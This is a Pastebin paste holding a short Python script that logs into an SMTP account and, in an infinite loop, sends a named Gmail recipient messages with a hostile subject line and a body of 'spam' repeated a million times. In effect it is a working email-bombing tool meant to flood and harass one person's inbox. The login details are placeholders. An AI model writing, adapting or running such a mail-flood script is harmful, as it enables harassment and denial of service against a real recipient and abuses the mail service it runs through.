Advertisement
Guest User

Untitled

a guest
Jan 26th, 2020
247
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.37 KB | None | 0 0
  1. import smtplib
  2. import ssl
  3.  
  4. user = 'myemailhere@cock.li'
  5. passwd = 'passwordhere'
  6. receiver = 'rightowner@gmail.com'
  7. c = ssl.create_default_context()
  8. s = 'spam'*(10**6)
  9.  
  10. while True:
  11. with smtplib.SMTP_SSL(host='mail.cock.li', port=465, context=c) as m:
  12. m.login(user, passwd)
  13. m.sendmail(user, receiver,
  14. '''Subject: git fukt
  15.  
  16. {}'''.format(s)
  17. )
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement